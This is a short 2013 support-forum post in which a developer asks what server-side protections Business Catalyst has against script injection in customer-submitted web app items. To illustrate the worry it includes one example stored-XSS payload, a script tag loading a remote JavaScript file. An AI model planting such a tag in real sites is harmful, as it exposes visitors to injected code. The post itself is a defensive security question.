2 Replies Latest reply on Jul 23, 2013 7:39 AM by AndrewKhan

    Web App Submission Security.

    AndrewKhan Level 1

      Hi All,


      Just a quick once, but a worrying one.


      What are business catayst's security measures for web app submissions? I am just building an app allowing one of my client's customers to submit web app items when logged in. And while the submissions are being moderated before being accepted and put online, I do worry for the security. We can do a certain amount to filter what is being submitted client-side, but as we all know it takes very little to disable javascript and overide that completely.


      The main thing I am worried for is script injection, for example if I posted:


      Hi, I'm Andrew making a fake enquiry that your client will think is okay and happily accept, woo!

      <script type="text/javascript" src="http://www.google.com/naughtyscriptfilecausingbigproblemsformeandmyclientsadface.js" />


      Now clearly having a script file injected into the page is bad, bad news, considering what you could do with that.


      What kind of security measures does Business Catalyst have in place to prevent this? There is nothing we can do client-side.